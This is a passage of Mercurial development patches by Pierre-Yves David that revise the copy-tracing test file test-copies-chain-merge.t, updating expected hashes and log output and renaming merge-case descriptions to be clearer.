R i #if no-changeset @@ -1345,7 +1345,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o 2 i-2: c -move-> d | ~ #endif @@ -1361,7 +1361,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o 2 i-2: c -move-> d | ~ #endif @@ -1509,15 +1509,15 @@ Details on this hash ordering pick: $ hg manifest --debug 'desc("g-1")' | egrep 'd$' - f2b277c39e0d2bbac99d8aae075c0d8b5304d266 644 d (no-changeset !) - 4ff57b4e8dceedb487e70e6965ea188a7c042cca 644 d (changeset !) + 7bded9d9da1f7bf9bf7cbfb24fe1e6ccf68ec440 644 d (no-changeset !) + 68d5bca9df0577b6bc2ea30ca724e13ead60da81 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d A d a (no-changeset no-compatibility !) $ hg manifest --debug 'desc("f-2")' | egrep 'd$' - 4a067cf8965d1bfff130057ade26b44f580231be 644 d (no-changeset !) - fe6f8b4f507fe3eb524c527192a84920a4288dac 644 d (changeset !) + c72365ee036fca4fb27fd745459bfb6ea1ac6993 644 d (no-changeset !) + b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d A d h (no-changeset no-compatibility !) @@ -1526,13 +1526,14 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm-0")' A d - h + h (no-filelog !) + a (filelog !) R a R h $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")' A d - a (no-filelog !) - h (filelog !) + a (no-changeset !) + h (changeset !) R a R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")' @@ -1548,12 +1549,12 @@ i (no-filelog !) R i $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mFGm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mGFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) 
R h #if no-changeset @@ -1575,12 +1576,8 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ + o 25 g-1: update d + | o 2 i-2: c -move-> d | ~ @@ -1605,12 +1602,8 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ + o 25 g-1: update d + | o 2 i-2: c -move-> d | ~ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614016125 -3600 # Mon Feb 22 18:48:45 2021 +0100 # Node ID d46885119f902efc5409d687fcf1f38043c265b4 # Parent 018d622e814df4fbcf3de589b7195788f5c226c3 test-copies: don't use empty file for "same content" cases For main case (using filelog or sidedata), this lead to the following hash change. Changesets: - 01c2f5eabdc4ce2bdee42b5f86311955e6c8f573 → 319179230cc87769ab3a861ebffe7a534ebb3d85 - 01c2f5eabdc4 → 319179230cc8 - c72365ee036fca4fb27fd745459bfb6ea1ac6993 → 6cbc9c2b7b391dd738603173717c601648d3735f - c72365ee036f → 6cbc9c2b7b39 File revision for `f`: - 0dd616bc7ab1a111921d95d76f69cda5c2ac539c → cedeacc5bf5d9b9be4d7f8394d33a5349bb29c6e - 0dd616bc7ab1 → cedeacc5bf5d - eb806e34ef6be4c264effd5933d31004ad15a793 → ffb76cd765422a18759a335d8a81fa2bd455be6b - eb806e34ef6b → ffb76cd76542 - 6da5a2eecb9c833f830b67a4972366d49a9a142c → 08d1ff5926fbd0285cdeb044cbe8ab651687e86a - 6da5a2eecb9c → 08d1ff5926fb File revision for `d`: - 7bded9d9da1f7bf9bf7cbfb24fe1e6ccf68ec440 → ba177bbb45ea930ee48469a55d40224537bd57a9 For the "extra in changeset" case we get the following change for file `d`: - 68d5bca9df0577b6bc2ea30ca724e13ead60da81 → b894de5c94aadcb4894ea7c358389819c27fbcce - 68d5bca9df05 → b894de5c94aa - b80de5d138758541c5f05265ad144ab9fa86d1db → 56647659eff080e06e45c18ea9e848836dadea71 - b80de5d13875 → 
56647659eff0 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -45,12 +45,23 @@ #endif + $ cat > same-content.txt << EOF + > Here is some content that will be the same accros multiple file. + > + > This is done on purpose so that we end up in some merge situation, were the + > resulting content is the same as in the parent(s), but a new filenodes still + > need to be created to record some file history information (especially + > about copies). + > EOF + $ hg init repo-chain $ cd repo-chain Add some linear rename initialy - $ touch a b h + $ cp ../same-content.txt a + $ cp ../same-content.txt b + $ cp ../same-content.txt h $ hg ci -Am 'i-0 initial commit: a b h' adding a adding b @@ -348,10 +359,10 @@ $ hg commit -m "f-2: rename i -> d" $ hg debugindex d rev linkrev nodeid p1 p2 - 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) - 0 2 b80de5d13875 000000000000 000000000000 (changeset !) + 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) 1 8 b004912a8510 000000000000 000000000000 - 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) + 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -1124,15 +1135,15 @@ $ hg manifest --debug --rev 'desc("d-2")' | grep '644 d' b004912a8510032a0350a74daa2803dadfb00e12 644 d $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' - 01c2f5eabdc4ce2bdee42b5f86311955e6c8f573 644 d (no-changeset !) - b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) + d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) 
$ hg debugindex d | head -n 4 rev linkrev nodeid p1 p2 - 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) - 0 2 b80de5d13875 000000000000 000000000000 (changeset !) + 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) 1 8 b004912a8510 000000000000 000000000000 - 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) - 2 25 68d5bca9df05 b80de5d13875 000000000000 (changeset !) + 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 2 25 5cce88bf349f ae258f702dfe 000000000000 (changeset !) Log output should not include a merge commit as it did not happen @@ -1183,30 +1194,30 @@ #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - eb806e34ef6be4c264effd5933d31004ad15a793 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - eb806e34ef6be4c264effd5933d31004ad15a793 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - 0dd616bc7ab1a111921d95d76f69cda5c2ac539c 644 f + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 6da5a2eecb9c833f830b67a4972366d49a9a142c 644 f + e8825b386367b29fec957283a80bb47b47483fe1 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 0dd616bc7ab1 000000000000 000000000000 - 1 10 6da5a2eecb9c 000000000000 000000000000 - 2 19 eb806e34ef6b 0dd616bc7ab1 6da5a2eecb9c + 0 4 b76eb76580df 000000000000 000000000000 + 1 10 e8825b386367 000000000000 000000000000 + 2 19 2ff93c643948 b76eb76580df e8825b386367 #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("a-2")' 
| grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 b80de5d13875 000000000000 000000000000 + 0 4 ae258f702dfe 000000000000 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -1509,15 +1520,15 @@ Details on this hash ordering pick: $ hg manifest --debug 'desc("g-1")' | egrep 'd$' - 7bded9d9da1f7bf9bf7cbfb24fe1e6ccf68ec440 644 d (no-changeset !) - 68d5bca9df0577b6bc2ea30ca724e13ead60da81 644 d (changeset !) + 17ec97e605773eb44a117d1136b3849bcdc1924f 644 d (no-changeset !) + 5cce88bf349f7c742bb440f2c53f81db9c294279 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d A d a (no-changeset no-compatibility !) $ hg manifest --debug 'desc("f-2")' | egrep 'd$' - c72365ee036fca4fb27fd745459bfb6ea1ac6993 644 d (no-changeset !) - b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) + 7b79e2fe0c8924e0e598a82f048a7b024afa4d96 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d A d h (no-changeset no-compatibility !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449163 -3600 # Tue Feb 16 05:19:23 2021 +0100 # Node ID c9f5027217831272db68c96233b104ae3b9882b5 # Parent d46885119f902efc5409d687fcf1f38043c265b4 test-copies: use intermediate variable some commit descriptions Right now, everything mostly says "simple merge", we want to use something a bit more descriptive. Before doing any changes, we do most of the churn. This helps the next sets of changesets to be clearer. 
Differential Revision: https://phab.mercurial-scm.org/D10036 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -185,18 +185,20 @@ - rename on one side - unrelated change on the other side + $ case_desc="simple merge" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("a-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBAm-0 simple merge - one way' + $ hg ci -m "mBAm-0 $case_desc - one way" $ hg up 'desc("a-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mABm-0 simple merge - the other way' + $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' @ 12 mABm-0 simple merge - the other way @@ -225,12 +227,14 @@ - one deleting the change and recreate an unrelated file after the merge + $ case_desc="simple merge" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBCm-0 simple merge - one way' + $ hg ci -m "mBCm-0 $case_desc - one way" $ echo bar > d $ hg add d $ hg ci -m 'mBCm-1 re-add d' @@ -239,7 +243,7 @@ $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mCBm-0 simple merge - the other way' + $ hg ci -m "mCBm-0 $case_desc - the other way" created new head $ echo bar > d $ hg add d @@ -271,18 +275,20 @@ - one with change to an unrelated file - one deleting and recreating the change + $ case_desc="simple merge" + $ hg 
up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBDm-0 simple merge - one way' + $ hg ci -m "mBDm-0 $case_desc - one way" $ hg up 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDBm-0 simple merge - the other way' + $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' @ 18 mDBm-0 simple merge - the other way @@ -309,13 +315,15 @@ - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) + $ case_desc="simple merge" + $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("e-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mAEm-0 simple merge - one way' + $ hg ci -m "mAEm-0 $case_desc - one way" $ hg up 'desc("e-2")' 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -323,7 +331,7 @@ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
(branch merge, don't forget to commit) - $ hg ci -m 'mEAm-0 simple merge - the other way' + $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' @ 20 mEAm-0 simple merge - the other way @@ -350,6 +358,8 @@ - one with change to an unrelated file (b) - one overwriting a file (d) with a rename (from h to i to d) + $ case_desc="simple merge" + $ hg up 'desc("i-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg mv h i @@ -370,13 +380,13 @@ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mBFm-0 simple merge - one way' + $ hg ci -m "mBFm-0 $case_desc - one way" $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mFBm-0 simple merge - the other way' + $ hg ci -m "mFBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' @ 24 mFBm-0 simple merge - the other way @@ -404,6 +414,8 @@ Unlike in the 'BD/DB' cases, an actual merge happened here. So we should consider history and rename on both branch of the merge. + $ case_desc="simple merge" + $ hg up 'desc("i-2")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) 
@@ -416,14 +428,14 @@ merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDGm-0 simple merge - one way' + $ hg ci -m "mDGm-0 $case_desc - one way" $ hg up 'desc("g-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' --tool :union merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mGDm-0 simple merge - the other way' + $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' @ 27 mGDm-0 simple merge - the other way @@ -457,6 +469,8 @@ | | The current code arbitrarily pick one side + $ case_desc="simple merge" + $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' --tool :union @@ -464,7 +478,7 @@ 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mFGm-0 simple merge - one way' + $ hg ci -m "mFGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) @@ -474,7 +488,7 @@ 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
(branch merge, don't forget to commit) - $ hg ci -m 'mGFm-0 simple merge - the other way' + $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' @ 29 mGFm-0 simple merge - the other way # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449606 -3600 # Tue Feb 16 05:26:46 2021 +0100 # Node ID e20977208924f715aef4671888424496d04a73cd # Parent c9f5027217831272db68c96233b104ae3b9882b5 test-copies: improve description of the A+B case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10037 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -185,7 +185,7 @@ - rename on one side - unrelated change on the other side - $ case_desc="simple merge" + $ case_desc="simple merge - A side: multiple renames, B side: unrelated update" $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -201,9 +201,9 @@ $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - @ 12 mABm-0 simple merge - the other way + @ 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ | o 5 b-1: b update | | @@ -682,9 +682,9 @@ i-0 initial commit: a b h i-1: a -move-> c i-2: c -move-> d - mABm-0 simple merge - the other way + mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAEm-0 simple merge - one way - mBAm-0 simple merge - one way + mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 mBCm-0 simple merge - one way mBCm-1 re-add d @@ -973,9 +973,9 @@ - unrelated change on the other side $ hg log -G --rev 
'::(desc("mABm")+desc("mBAm"))' - o 12 mABm-0 simple merge - the other way + o 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ | o 5 b-1: b update | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449744 -3600 # Tue Feb 16 05:29:04 2021 +0100 # Node ID 979838adc46b5337b4e54679f17b57ca544b96ee # Parent e20977208924f715aef4671888424496d04a73cd test-copies: improve description of the B+C case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10038 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -227,7 +227,7 @@ - one deleting the change and recreate an unrelated file after the merge - $ case_desc="simple merge" + $ case_desc="simple merge - C side: delete a file with copies history , B side: unrelated update" $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -251,11 +251,11 @@ $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' @ 16 mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ | | o 14 mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ | o 6 c-1 delete d | | @@ -686,12 +686,12 @@ mAEm-0 simple merge - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 - mBCm-0 simple merge - one way + mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - one way mBFm-0 simple 
merge - one way mCB-revert-m-0 - mCBm-0 simple merge - the other way + mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 mCH-delete-before-conflict-m-0 @@ -1034,11 +1034,11 @@ $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' o 16 mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ | | o 14 mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ | o 6 c-1 delete d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449940 -3600 # Tue Feb 16 05:32:20 2021 +0100 # Node ID 9a58f9eed30337da4bb442dd25c262a69827db4d # Parent 979838adc46b5337b4e54679f17b57ca544b96ee test-copies: improve description of the B+D case This will make its role clearer. 
Differential Revision: https://phab.mercurial-scm.org/D10039 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -275,7 +275,7 @@ - one with change to an unrelated file - one deleting and recreating the change - $ case_desc="simple merge" + $ case_desc="simple merge - B side: unrelated update, D side: delete and recreate a file (with different content)" $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -291,9 +291,9 @@ $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - @ 18 mDBm-0 simple merge - the other way + @ 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ | o 8 d-2 re-add d | | @@ -688,14 +688,14 @@ mBC-revert-m-0 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d - mBDm-0 simple merge - one way + mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - one way mCB-revert-m-0 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 mCH-delete-before-conflict-m-0 - mDBm-0 simple merge - the other way + mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 simple merge - one way mEAm-0 simple merge - the other way mFBm-0 simple merge - the other way @@ -1108,9 +1108,9 @@ - one deleting and recreating the change $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - o 18 mDBm-0 simple merge - the other way + o 
18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ | o 8 d-2 re-add d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613450118 -3600 # Tue Feb 16 05:35:18 2021 +0100 # Node ID 19f490690880572782a482f556ddfdfed05d457b # Parent 9a58f9eed30337da4bb442dd25c262a69827db4d test-copies: improve description of the A+E case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10040 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -315,7 +315,7 @@ - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) - $ case_desc="simple merge" + $ case_desc="merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f)" $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -334,9 +334,9 @@ $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - @ 20 mEAm-0 simple merge - the other way + @ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ | o 10 e-2 g -move-> f | | @@ -683,7 +683,7 @@ i-1: a -move-> c i-2: c -move-> d mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way - mAEm-0 simple merge - one way + mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) 
- one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way @@ -697,7 +697,7 @@ mCH-delete-before-conflict-m-0 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 simple merge - one way - mEAm-0 simple merge - the other way + mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way mFGm-0 simple merge - one way mGCm-0 @@ -1188,9 +1188,9 @@ - the "a-" branch renaming d to f (through e) $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - o 20 mEAm-0 simple merge - the other way + o 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ | o 10 e-2 g -move-> f | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613450362 -3600 # Tue Feb 16 05:39:22 2021 +0100 # Node ID 1e96fdcc8bc1387544ed205916650f74d2058c38 # Parent 19f490690880572782a482f556ddfdfed05d457b test-copies: improve description of the D+G case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10041 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -414,7 +414,7 @@ Unlike in the 'BD/DB' cases, an actual merge happened here. So we should consider history and rename on both branch of the merge. 
- $ case_desc="simple merge" + $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content" $ hg up 'desc("i-2")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) @@ -438,9 +438,9 @@ $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - @ 27 mGDm-0 simple merge - the other way + @ 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ | o 25 g-1: update d | | @@ -696,12 +696,12 @@ mCGm-0 mCH-delete-before-conflict-m-0 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way - mDGm-0 simple merge - one way + mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way mFGm-0 simple merge - one way mGCm-0 - mGDm-0 simple merge - the other way + mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 simple merge - the other way mHC-delete-before-conflict-m-0 @@ -1400,9 +1400,9 @@ consider history and rename on both branch of the merge. 
$ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - o 27 mGDm-0 simple merge - the other way + o 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ | o 25 g-1: update d | | @@ -1456,7 +1456,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | @@ -1485,7 +1485,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613450792 -3600 # Tue Feb 16 05:46:32 2021 +0100 # Node ID 2f99dedf96b10f62e45bc052c48f62de7b42676d # Parent 1e96fdcc8bc1387544ed205916650f74d2058c38 test-copies: improve description of the G+F case This will make its role clearer. 
